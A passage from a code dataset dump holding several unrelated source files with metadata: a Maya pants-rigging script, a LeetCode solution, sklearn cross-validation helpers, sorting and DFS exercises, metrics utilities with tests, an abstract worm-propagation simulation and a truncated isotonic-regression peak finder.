(\"%s_leg_01_deform_ctrl_01\" % side)\n jnt2 = (\"%s_leg_01_deform_ctrl_02\" % side)\n jnt3 = (\"%s_leg_01_deform_ctrl_03\" % side)\n jnt4 = (\"%s_leg_01_deform_ctrl_04\" % side)\n\n # refer to thigh nt joints\n ntjnt1 = (\"%s_leg_01_no_twist_ctrl_01\" % side)\n ntjnt2 = (\"%s_leg_01_no_twist_ctrl_02\" % side)\n ntjnt3 = (\"%s_leg_01_no_twist_ctrl_03\" % side)\n ntjnt4 = (\"%s_leg_01_no_twist_ctrl_04\" % side)\n\n # controls\n tempCrcl1 = mc.circle(n=\"%s_tempCircle1\" % side)\n mc.delete(tempCrcl1, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl1[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl1[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl1[0], ntjnt1, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl1[0])\n\n oriConst1 = mc.orientConstraint(jnt1, ntjnt1, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst1[0])\n\n tempCrcl2 = mc.circle(n=\"%s_tempCircle2\" % side)\n mc.delete(tempCrcl2, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl2[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl2[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl2[0], ntjnt2, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl2[0])\n\n oriConst2 = mc.orientConstraint(jnt2, ntjnt2, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst2[0])\n\n tempCrcl3 = mc.circle(n=\"%s_tempCircle3\" % side)\n mc.delete(tempCrcl3, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl3[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl3[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl3[0], ntjnt3, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl3[0])\n\n oriConst3 = mc.orientConstraint(jnt3, ntjnt3, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst3[0])\n\n tempCrcl4 = mc.circle(n=\"%s_tempCircle4\" % side)\n mc.delete(tempCrcl4, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl4[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl4[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl4[0], ntjnt4, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl4[0])\n\n oriConst4 = mc.orientConstraint(jnt4, ntjnt4, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst4[0])\n\n theSet = mc.sets(ntjnt1, ntjnt2, ntjnt3, ntjnt4, n=\"%s_thigh_NoTwistJoints_skin_set\" % side)\n mc.sets(theSet, add=\"skin_set\")\n\n #######################################\n ############ Manipulators #############\n #######################################\n\n # right side top pivots' proper orientation\n\n def topPivotOrient(number):\n\n import maya.cmds as mc\n\n pivotControl = (\"R_pants_0%s_pivot_top_ctrl\" % number)\n pantsControl = mc.listRelatives(pivotControl, c=True, type=\"transform\")\n pivotControlTopGrp = mc.listRelatives(\"%s_orig\" % pivotControl, p=True, )\n\n mc.parent(pantsControl[0], w=True)\n\n mc.parent(\"%s_orig\" % pivotControl, w=True)\n\n mc.setAttr(\"%s_orig.scale\" % pivotControl, -1, -1, -1)\n\n mc.parent(pantsControl, pivotControl)\n mc.parent(\"%s_orig\" % pivotControl, \"%s\" % pivotControlTopGrp[0])\n\n # right side main controls' proper orientation\n\n def rightSideOrient(number):\n\n import maya.cmds as mc\n\n controller = (\"R_pants_0%s_ctrl\" % number)\n\n kids = mc.listRelatives(controller, c=True, type='transform')\n mc.parent(kids, w=True)\n mc.setAttr('%s_orig.scale' % controller, -1, -1, 1)\n mc.parent(kids, controller)\n for kid in kids:\n mc.setAttr('%s.scale' % kid, -1, -1, 1)\n\n # fix size of fifth ring\n\n def fix5thRing(side):\n\n import maya.cmds as mc\n\n ring = (\"%s_pants_05_ctrl\" % side)\n\n mc.scale(.75, .75, .75, \"%s.cv[0:9]\" % ring)\n\n # reparent viz controls for the pantss\n\n def vcReparent(side):\n\n import maya.cmds as mc\n\n ctrl = (\"%s_pants_top_pivot_attr_ctrl_orig\" % side)\n\n mc.parent(ctrl, \"%s_leg_02_no_twist_SKN_04_orig\" % side)\n\n # Connect Manips to the follicles\n\n def parentManips(side):\n\n import maya.cmds as mc\n\n blendelbFrnt = \"%s_kneeFrnt_twist_choice_bta\" % side\n blendfrleg = \"%s_foreleg_twist_choice_bta\" % side\n blendankle = \"%s_ankle_twist_choice_bta\" % side\n\n attrControl = \"%s_leg_SW_ctrl\" % side\n rev = mc.createNode(\"reverse\", n=\"%s_leg_02_no_twist_rev\" % side)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.ix\" % rev)\n\n ntJnt1 = \"%s_leg_02_no_twist_ctrl_01\" % side\n ntJnt2 = \"%s_leg_02_no_twist_ctrl_02\" % side\n ntJnt3 = \"%s_leg_02_no_twist_ctrl_03\" % side\n ntJnt4 = \"%s_leg_02_no_twist_ctrl_04\" % side\n\n Jnt1 = \"%s_leg_02_deform_ctrl_01\" % side\n Jnt2 = \"%s_leg_02_deform_ctrl_02\" % side\n Jnt3 = \"%s_leg_02_deform_ctrl_03\" % side\n Jnt4 = \"%s_leg_02_deform_ctrl_04\" % side\n\n svl1 = \"%s_pants_01_pivot_top_ctrl\" % side\n svl2 = \"%s_pants_02_pivot_top_ctrl\" % side\n svl3 = \"%s_pants_03_pivot_top_ctrl\" % side\n svl4 = \"%s_pants_04_pivot_top_ctrl\" % side\n svl5 = \"%s_pants_05_pivot_top_ctrl\" % side\n\n knee = mc.duplicate(\"%s_leg_02\" % side, n=\"%s_leg_02_no_twist\" % side, po=True)\n mc.parent(knee[0], \"%s_leg_02\" % side)\n tempOriConst = mc.orientConstraint(ntJnt4, knee[0])\n mc.delete(tempOriConst)\n\n tempConst1 = mc.pointConstraint(ntJnt4, \"%s_orig\" % svl1, sk=(\"y\", \"z\"))\n mc.delete(tempConst1)\n tempConst2 = mc.pointConstraint(ntJnt3, \"%s_orig\" % svl2, sk=(\"y\", \"z\"))\n mc.delete(tempConst2)\n tempConst3 = mc.pointConstraint(ntJnt2, \"%s_orig\" % svl3, sk=(\"y\", \"z\"))\n mc.delete(tempConst3)\n tempConst4 = mc.pointConstraint(ntJnt1, \"%s_orig\" % svl4, sk=(\"y\", \"z\"))\n mc.delete(tempConst4)\n\n grp1 = mc.group(em=True, n=\"%s_transform\" % svl1, p=ntJnt4)\n tempConst5 = mc.pointConstraint(ntJnt4, grp1)\n mc.delete(tempConst5)\n oriCnst1 = mc.orientConstraint(ntJnt4, knee[0], grp1, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst1[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst1[0])\n mc.parent(\"%s_orig\" % svl1, grp1)\n\n grp5 = mc.group(em=True, n=\"%s_transform\" % svl5, p=ntJnt4)\n tempConst6 = mc.pointConstraint(ntJnt4, grp5, sk=\"x\")\n mc.delete(tempConst6)\n oriCnst2 = mc.orientConstraint(ntJnt4, knee[0], grp5, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst2[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst2[0])\n mc.parent(\"%s_orig\" % svl5, grp5)\n\n grp2 = mc.group(em=True, n=\"%s_transform\" % svl2, p=ntJnt3)\n tempConst7 = mc.pointConstraint(ntJnt3, grp2)\n mc.delete(tempConst7)\n oriCnst3 = mc.orientConstraint(ntJnt3, knee[0], grp2, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst3[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst3[0])\n mc.parent(\"%s_orig\" % svl2, grp2)\n\n grp3 = mc.group(em=True, n=\"%s_transform\" % svl3, p=ntJnt2)\n tempConst8 = mc.pointConstraint(ntJnt2, grp3)\n mc.delete(tempConst8)\n oriCnst4 = mc.orientConstraint(ntJnt2, knee[0], grp3, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst4[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst4[0])\n mc.parent(\"%s_orig\" % svl3, grp3)\n\n grp4 = mc.group(em=True, n=\"%s_transform\" % svl4, p=ntJnt1)\n tempConst9 = mc.pointConstraint(ntJnt1, grp4)\n mc.delete(tempConst9)\n oriCnst5 = mc.orientConstraint(ntJnt1, knee[0], grp4, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst5[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst5[0])\n mc.parent(\"%s_orig\" % svl4, grp4)\n\n #######################################\n ########## execute functions ##########\n #######################################\n\n # variables\n\n sides = [\"L\", \"R\"]\n sections = [\"01\", \"02\"]\n numbers = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n\n ###No Roll\n\n # no twist joints\n for side in sides:\n ankleNoTwist(side)\n forelegNoTwist(side)\n kneeFrontNoTwist(side)\n kneeBackNoTwist(side)\n upperlegNoTwist(side)\n hipNoTwist(side)\n\n # duplicate NURBS surfaces\n for side in sides:\n for section in sections:\n surfaceDuplicate(side, section)\n\n # follicle maker\n for side in sides:\n for section in sections:\n legsfollicles(side, section)\n\n # thighs' controls\n for side in sides:\n thighJnts(side)\n\n ###Manipulators\n\n # right side proper orientation\n for number in numbers:\n topPivotOrient(number)\n rightSideOrient(number)\n\n # connect no roll to manipulators\n for side in sides:\n parentManips(side)\n vcReparent(side)\n\n # correction of the first ring on the right side\n mc.parent(\"R_pants_01_ctrl_orig\", w=True)\n mc.setAttr(\"R_pants_01_pivot_top_ctrl_orig.scale\", -1, -1, -1)\n mc.parent(\"R_pants_01_ctrl_orig\", \"R_pants_01_pivot_top_ctrl\")\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[0]\", os=True, r=True)\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[2:3]\", os=True, r=True)\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[5:9]\", os=True, r=True)\n\n # intermediate joints' proper orientation\n interms = mc.ls(\"R*interm*ctrl_orig\")\n\n for interm in interms:\n trnsfrms = mc.listRelatives(interm, p=True)\n for trnsfrm in trnsfrms:\n mc.setAttr('%s.rotate' % interm, 0, 180, 180)\n mc.setAttr('%s.scale' % interm, -1, 1, 1)\n\n # fix size of fifth ring\n for side in sides:\n fix5thRing(side)\n\n ######################## End\n\n pantsTemplate = (\"pants_ctrls_template\")\n\n if mc.objExists(pantsTemplate):\n\n main()\n\n else:\n\n pass","repo_name":"lapointea/patch","sub_path":"noRollPants/pantsPreBehavior.py","file_name":"pantsPreBehavior.py","file_ext":"py","file_size_in_byte":32590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42811582069","text":"from typing import List\n\n\nclass Solution:\n def maxPower(self, s: str) -> int:\n i, N = 0, len(s)\n res = 0\n while i < N:\n j = i + 1\n while j < N and s[i] == s[j]:\n j += 1\n res = max(res, j - i)\n i = j\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.maxPower(\"hooraaaaaaaaaaay\")\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Easy/1446. Consecutive Characters/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21355760004","text":"import sklearn.model_selection as ms\nimport sklearn.metrics as metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom collections import OrderedDict\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import validation_curve\n\ndef plot_validation_curve(model, X, y, param_name, param_range, cv=10):\n \"\"\"\n Строит кривые обучения по изменению параметра. Кривая проверки на обучающей и на тестовой выборке от значения параметра.\n :param model: модель\n :param X:\n :param y:\n :param param_name: имя параметра модели, которое надо менять, например, polynomialfeatures__degree\n :param param_range: массив значений параметра\n :param cv: количество фолдов или объект Fold\n \"\"\"\n train_score, val_score = validation_curve(model, X, y, param_name, param_range, cv)\n plt.plot(param_range, np.median(train_score, 1), color='blue', label='training score')\n plt.plot(param_range, np.median(val_score, 1), color='red', label='validation score')\n plt.legend(loc='best')\n plt.ylim(0, 1)\n plt.xlabel('degree')\n plt.draw()\n plt.show()\n\ndef plot_roc_curve(y_test, predict):\n fpr, tpr, thresholds = metrics.roc_curve(y_test, predict)\n rc_score = metrics.roc_auc_score(y_test, predict)\n plt.title('ROC (AUC=%0.2f)' % (rc_score))\n plt.fill_between(fpr, tpr, alpha=0.2)\n plt.grid(True, linestyle='-', color='0.75')\n plt.plot(fpr, tpr, linewidth=2, label=\"roc\")\n plt.plot(fpr, thresholds, linewidth=1, label=\"thresholds\")\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlabel('fpr')\n plt.ylabel('tpr')\n plt.axis([0, 1, 0, 1])\n plt.draw()\n plt.show()\n\n\ndef plot_pr(y_test, predict):\n p, r, thresholds = metrics.precision_recall_curve(y_test, predict)\n\n plt.title('PR')\n plt.fill_between(r, p, alpha=0.2)\n plt.grid(True, linestyle='-', color='0.75')\n plt.plot(r, p, linewidth=2, label=\"roc\")\n plt.plot(r[:-1], thresholds, linewidth=1, label=\"thresholds\")\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.axis([0, 1, 0, 1])\n plt.draw()\n plt.show()\n\n\n\n\ndef selection_models(preprocess, train_data, n_splits=10, scoring='roc_auc', models=None):\n \"\"\"\n Производит кросс-валидацию указанных моделей на обучающем наборе\n Набор должен содержать столбец с именем целевой переменной target\n :param preprocess: подготовленный объект препроцессинга\n :param train_data: датасет\n :param n_splits: количество разбиений датасета\n :param scoring: тип метрики для валидации\n :param models: список моделей(настроенных инстансов)\n :return:\n \"\"\"\n if models is None:\n raise Exception(\"Необходимо указать список моделей\")\n preprocessed = preprocess.preprocess_data(train_data)\n return selection_models2(preprocessed, n_splits, scoring, models)\n\n\ndef selection_models2(preprocessed, n_splits=10, scoring='roc_auc', models=None):\n \"\"\"\n Производит кросс-валидацию указанных моделей на обучающем наборе\n :param preprocessed:\n :param n_splits:\n :param scoring:\n :param models: инстанс модели\n :return:\n \"\"\"\n if models is None:\n raise Exception(\"Необходимо указать список моделей\")\n\n y = preprocessed.target\n x = preprocessed.drop([\"target\"], axis=1)\n\n cross_val_results = dict()\n\n for model in models:\n print(\" Обработка модели:\", type(model))\n scores = ms.cross_val_score(\n model,\n x,\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=123))\n\n cross_val_results[model] = {\n \"scores\": scores,\n \"variance\": np.var(scores),\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n }\n\n return cross_val_results\n\n\ndef print_scores(scores):\n for m, sc in scores.items():\n print(\"=====\", m, \"=====\", \"\\n\")\n for k, v in sc.items():\n print(k, v, \"\\n\")\n\n\ndef random_forest_one_to_one_cols(pd_dataframe, target_name, scoring='roc_auc', n_splits=10, random_state=123):\n y = pd_dataframe.target\n x = pd_dataframe.drop([\"target\"], axis=1)\n\n cross_val_results = []\n\n for col in x.columns:\n print(\" Обработка столбца:\", col)\n scores = ms.cross_val_score(\n RandomForestClassifier(),\n x[[col]],\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state))\n\n cross_val_results.append({\n \"column\": col,\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n })\n\n return sorted(cross_val_results, key=lambda t: t[\"mean\"])\n\n\ndef classification_exp(pd_dataframe, column_names, target_name, scoring='roc_auc', n_splits=10, random_state=123, model=RandomForestClassifier):\n y = pd_dataframe.target\n x = pd_dataframe.drop([target_name], axis=1)\n\n scores = ms.cross_val_score(\n model(),\n x[column_names],\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state))\n\n print({\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n })\n\n\ndef find_key_attrs(data, target_name):\n forest = RandomForestClassifier(n_estimators=400, oob_score=True)\n forest.fit(data.drop([target_name], axis=1), data[target_name])\n feature_importance = forest.feature_importances_\n feature_importance = 100.0 * (feature_importance / feature_importance.max())\n fi_threshold = 5\n important_idx = np.where(feature_importance > fi_threshold)[0]\n important_features = data.columns[important_idx]\n print(\"\\n\", important_features.shape[0], \"Important features(>\", fi_threshold, \"% of max importance)...\\n\")\n # important_features\n sorted_idx = np.argsort(feature_importance[important_idx])[::-1]\n # get the figure about important features\n pos = np.arange(sorted_idx.shape[0]) + .5\n # plt.subplot(1, 2, 2)\n plt.title('Feature Importance')\n plt.barh(pos, feature_importance[important_idx][sorted_idx[::-1]],\n color='r', align='center')\n plt.yticks(pos, important_features[sorted_idx[::-1]])\n plt.xlabel('Relative Importance')\n plt.draw()\n plt.show()\n print(important_features[sorted_idx[::-1]])\n\n\n\n# Не секрет, что зачастую самым важным при решении задачи является умение правильно отобрать и даже создать признаки. В англоязычной литературе это называется Feature Selection и Feature Engineering. В то время как Future Engineering довольно творческий процесс и полагается больше на интуицию и экспертные знания, для Feature Selection есть уже большое количество готовых алгоритмов. «Древесные» алгоритмы допускают расчета информативности признаков:\n#\n# from sklearn import metrics\n# from sklearn.ensemble import ExtraTreesClassifier\n# model = ExtraTreesClassifier()\n# model.fit(X, y)\n# # display the relative importance of each attribute\n# print(model.feature_importances_)\n#\n#\n# Все остальные методы так или иначе основаны на эффективном переборе подмножеств признаков с целью найти наилучшее подмножество, на которых построенная модель дает наилучшее качество. Одним из таких алгоритмов перебора является Recursive Feature Elimination алгоритм, который также доступен в библиотеке Scikit-Learn:\n#\n# from sklearn.feature_selection import RFE\n# from sklearn.linear_model import LogisticRegression\n# model = LogisticRegression()\n# # create the RFE model and select 3 attributes\n# rfe = RFE(model, 3)\n# rfe = rfe.fit(X, y)\n# # summarize the selection of the attributes\n# print(rfe.support_)\n# print(rfe.ranking_)\n","repo_name":"lightway82/sfml","sub_path":"hw_03/project/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33895816391","text":"# 1,2,3 더하기\n\ndef dfs(n, hap):\n ans=0\n if hap==n:\n ans+=1\n if hap>=n:\n return ans\n for i in range(1, 4):\n ans+=dfs(n, hap+i)\n return ans\n\nt=int(input())\n#3\n#4 7 10\nfor _ in range(t):\n n=int(input())\n ans=0\n for i in range(1,4):\n ans+=dfs(n, i)\n print(ans)\n","repo_name":"Greek-and-Roman-God/Athena","sub_path":"codingtest/week12/plus_1_2_3.py","file_name":"plus_1_2_3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5590363952","text":"def find_smallest(lst):\n smallest_index = 0\n smallest_item = lst[0]\n for i in range(1, len(lst)):\n if smallest_item > lst[i]:\n smallest_item = lst[i]\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(lst):\n new_lst = []\n for i in range(len(lst)):\n small_index = find_smallest(lst)\n new_lst.append(lst.pop(small_index))\n return new_lst\n\n\nif __name__ == '__main__':\n print(selection_sort([4, 9, 7, 5, 3, 8]))\n","repo_name":"chenyang929/grokking_algorithms","sub_path":"02 选择排序/02_selection_sort.py","file_name":"02_selection_sort.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20167732352","text":"import datetime\nimport json\nimport logging\nimport os\nfrom typing import Union, Any\n\nlogger = logging.getLogger(\"metricsGatherer.utils\")\n\n\ndef read_file(folder: str, filename: str) -> str:\n \"\"\"Read file content as string (UTF-8)\"\"\"\n with open(os.path.join(folder, filename), \"r\") as file:\n return file.read()\n\n\ndef read_json_file(folder: str, filename: str, to_json=False) -> Union[str, Any]:\n \"\"\"Read fixture from file\"\"\"\n content = read_file(folder, filename)\n return content if not to_json else json.loads(content)\n\n\ndef is_the_time_for_task_starting(allowed_start_time, allowed_end_time):\n start = datetime.time(int(allowed_start_time.split(\":\")[0]), int(allowed_start_time.split(\":\")[1]))\n end = datetime.time(int(allowed_end_time.split(\":\")[0]), int(allowed_end_time.split(\":\")[1]))\n now_time = datetime.datetime.now().time()\n if start > end:\n return (now_time >= start and now_time <= datetime.time(23, 59)) or \\\n (now_time >= datetime.time(0, 0) and now_time <= end)\n return now_time >= start and now_time <= end\n\n\ndef take_the_date_to_check():\n now_time = datetime.datetime.now().time()\n if (now_time >= datetime.time(12, 0) and now_time <= datetime.time(23, 59)):\n return datetime.datetime.now()\n return datetime.datetime.now() - datetime.timedelta(days=1)\n\n\ndef parse_conditions(conditions):\n parsed_conditions = []\n for condition in conditions.split(\"|\"):\n if not condition.strip():\n continue\n chosen_operator = \"\"\n for operator in [\">=\", \"<=\", \"==\", \"=\", \"<\", \">\"]:\n if operator in condition:\n chosen_operator = operator\n break\n condition_changed = condition.replace(chosen_operator, \" \").split()\n if len(condition_changed) == 2:\n metric_score = None\n try:\n metric_score = int(condition_changed[1].strip())\n except: # noqa\n try:\n metric_score = float(condition_changed[1].strip())\n except: # noqa\n pass\n if metric_score is not None:\n parsed_conditions.append(\n (condition_changed[0].strip(), chosen_operator, metric_score))\n return parsed_conditions\n\n\ndef compare_metrics(cur_metric, metric_threshold, operator):\n if operator == \">=\":\n return cur_metric >= metric_threshold\n if operator == \">\":\n return cur_metric > metric_threshold\n if operator == \"<=\":\n return cur_metric <= metric_threshold\n if operator == \"<\":\n return cur_metric < metric_threshold\n if operator in [\"==\", \"=\"]:\n return cur_metric == metric_threshold\n return False\n","repo_name":"reportportal/service-metrics-gatherer","sub_path":"app/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29019723337","text":"import pytest\n\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import HttpResponse\nfrom sys import platform\n\n\nMAC_OS = platform == 'darwin'\n\n\n@pytest.mark.skipif(condition=not MAC_OS,\n reason='TVM not working with Docker for Mac due to IPv6')\n@pytest.mark.usefixtures('enable_tvm_middleware')\ndef test_ping(client):\n \"\"\"\n Тест вьюхи с пингом\n \"\"\"\n response = client.get('/ping/')\n assert response.status_code == 200\n assert response.content.decode() == 'pong'\n\n\n@pytest.mark.django_db\ndef test_auth_ping(jclient):\n \"\"\"\n Тест пинга с авторизацией, проверка самого `jclient`\n \"\"\"\n auth_ping_url = reverse('auth_ping')\n\n # делаем запрос без авторизации\n response = jclient.get(auth_ping_url)\n assert response.status_code == 401\n\n # авторизовываемся и делаем запрос\n jclient.login()\n response = jclient.get(auth_ping_url)\n assert response.status_code == 200\n assert response.content.decode() == 'pong'\n\n # разлогиниваемся\n jclient.logout()\n response = jclient.get(auth_ping_url)\n assert response.status_code == 401\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/integration_tests/kelvin/common/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8249345557","text":"import random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nruns = 3\r\nOMEGA = 100000\r\nTotal_vulnerable_ip = 1000\r\ntotal_simulation_steps = 10000\r\nSCAN_RATE = 5\r\n\r\n\r\ndef initialize_ip_address_state():\r\n ip_addr_space = ['immune' for i in range(OMEGA+1)]\r\n for i in range(int(100/10)):\r\n for j in range(1, 101):\r\n ip_addr_space[j + (i * 10000)] = 'vulnerable'\r\n #print(ip_addr_space[j+ (i * 10000)])\r\n return ip_addr_space\r\n\r\n\r\n\r\ndef worm_propagation(ip_addr_state, method):\r\n infected_ip_count_discrete = []\r\n num_of_infected_ip = 1\r\n\r\n for tick in range(total_simulation_steps):\r\n num_of_ips_to_scan = num_of_infected_ip * SCAN_RATE\r\n if method == 'random_scan':\r\n infected_ips = random.sample(range(1, OMEGA + 1), num_of_ips_to_scan)\r\n elif method == 'local_preference':\r\n infected_ips = get_local_ips(ip_addr_state)\r\n elif method == 'seqential':\r\n infected_ips = sequential_scan(ip_addr_state, num_of_ips_to_scan)\r\n# print(infected_ips)\r\n for ip in infected_ips:\r\n if ip_addr_state[ip] == 'vulnerable':\r\n ip_addr_state[ip] = 'infected'\r\n num_of_infected_ip += 1\r\n if num_of_infected_ip == Total_vulnerable_ip:\r\n break\r\n\r\n if (tick + 1) % 100 == 0:\r\n print(\"Time steps: {0} ---- IPs_infected: {1}\".format(tick + 1, num_of_infected_ip))\r\n infected_ip_count_discrete.append(num_of_infected_ip)\r\n if num_of_infected_ip == Total_vulnerable_ip:\r\n print(\"Time steps: {0} ---- IPs_infected: {1}. \\nAll IPs infected!!!\".format(tick + 1,\r\n num_of_infected_ip))\r\n break\r\n return infected_ip_count_discrete\r\n\r\n\r\ndef plot_simulation(count, run):\r\n plt.plot(count, \"-\", label=\"Run #{}\".format(run + 1))\r\n\r\n\r\ndef worm_propagation_simulation(method, plot=False):\r\n for run in range(runs):\r\n print(\"\\n ****** {} Scan worm propagation: Run{}******\".format(method, run+1))\r\n ip_addr_state = initialize_ip_address_state()\r\n # print([i for i, x in enumerate(ip_addr_state) if x == 'immune'])\r\n ip_addr_state[10050] = 'infected'\r\n infected_ip_count_discrete = worm_propagation(ip_addr_state, method)\r\n if plot:\r\n plot_simulation(infected_ip_count_discrete, run)\r\n if plot:\r\n plt.xlabel(\"Time tick\")\r\n plt.ylabel(\"Number of infected computers\")\r\n plt.title(\"{}: 3 Simulation Runs of Worm Propagation\".format(method))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef main():\r\n random.seed(1)\r\n methods = ['random_scan']\r\n for method in methods:\r\n worm_propagation_simulation(method, plot=True)\r\n\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"ashishj22606/Worm-Propogation-Simulator","sub_path":"random_scan.py","file_name":"random_scan.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29895598024","text":"from isotonic_regression_l1_total_order import isotonic_regression_l1_total_order\nimport numpy as np\nimport random\n\ndef isotonic_regression_l1_total_order_decrease(y,w):\n return -isotonic_regression_l1_total_order(-y,w)\n\n\ndef solve_minimization(y, S):\n\n increase = True\n j = 0\n s = len(S)\n x = np.zeros_like(y)\n x[:S[j]] = isotonic_regression_l1_total_order(y[:S[j]], np.ones(S[j]))\n for j in range(0,s-1):\n increase = not increase\n if increase:\n x[S[j]:S[j+1]] = isotonic_regression_l1_total_order(y[S[j]:S[j+1]], np.ones(S[j+1]-S[j]))\n else:\n x[S[j]:S[j+1]] = isotonic_regression_l1_total_order_decrease(y[S[j]:S[j+1]], np.ones(S[j+1]-S[j]))\n x[S[-1]:] = isotonic_regression_l1_total_order_decrease(y[S[-1]:], np.ones(len(y)-S[-1]))\n return x, np.sum(np.abs(x-y))\n\ndef peak_finder_random_search(y,n_peaks,n_trials = 1000):\n n = len(y)\n x_best = []\n S_best = []\n opt_best = np.Inf\n for _ in range(n_trials):\n S = sorted(random.sample(range(n), 2*n_peaks-1))\n x, opt = solve_minimization(y,S)\n if opt < opt_best:\n x_best = x\n S_best = S\n opt_best = opt\n return x_best, S_best, opt_best\n\ndef peak_finder_improve(y, S_best, opt_best):\n n = len(y)\n s = len(S_best)\n for j in range(s):\n S = [S_best[k] for k in range(s)]\n if (S[j]-1 >= 0):\n if (j == 0) or (S[j]-1 > S[j-1]):\n S[j] -= 1\n x_test, opt_test = solve_minimization(y,S)\n if opt_test < opt_best:\n return x_test, S, opt_test\n S = [S_best[k] for k in range(s)]\n if (S[j] + 1 < n):\n if (j==s-1) or (S[j]+1 < S[j+1]):\n S[j] += 1\n x_test, opt_test = solve_minimization(y,S)\n if opt_test < opt_best:\n return x_test, S, opt_test\n return [], S_best, opt_best\n\ndef peak_finder(y,n_peaks,n_trials= 1000):\n if n_peaks == 0:\n x_inc = isotonic_regression_l1_total_order(y,np.ones_like(y))\n x_dec = isotonic_regression_l1_total_order_decrease(y,np.ones_like(y))\n opt_inc = np.sum(np.abs(y-x_inc))\n opt_dec = np.sum(np.abs(y-x_dec))\n if opt_inc > opt_dec:\n return [], x_dec, opt_dec\n else:\n return [], x_dec, opt_inc\n if n_peaks == 1:\n S = [0]\n x,opt = solve_minimization(y, [0])\n for i in range(1,len(y)):\n x_imp,opt_imp = solve_minimization(y, [i])\n if opt_imp < opt:\n x,opt = x_imp,opt_imp\n S = [i]\n return S,x,opt\n else:\n x,S,opt = 